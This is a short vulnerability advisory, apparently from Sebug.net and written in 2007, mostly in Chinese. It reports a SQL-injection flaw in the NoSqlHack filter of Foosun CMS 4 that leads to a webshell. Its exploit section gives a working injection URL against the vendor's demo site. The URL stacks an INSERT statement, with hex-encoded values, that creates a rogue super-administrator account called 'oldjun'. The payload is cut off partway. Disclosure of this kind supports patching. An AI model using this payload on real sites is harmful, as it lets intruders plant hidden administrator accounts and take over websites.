风讯4的防注射函数NoSqlHack存在致命缺陷,导致入侵者可以轻松得到webshell
Function.asp
Function NoSqlHack(FS_inputStr)
防注射函数的漏洞
foosun cms4sp5 商业版存在严重注射漏洞
Published:2007-10-18
Vulnerable:
风讯4
Discription:
<*References
flyh4t&oldjun(www.oldjun.com)*>
SEBUG Solution:
官方升级
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
下面的代码可以创建一个用户名为oldjun,密码为12345678的超级管理员
http://demo.foosun.net/User/i_Blog/PublicLogEdit.asp?id=2;insert%0D%0A%0D%0Ainto%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x380033006100610034003000300
// Sebug.net [ 2007-10-18 ]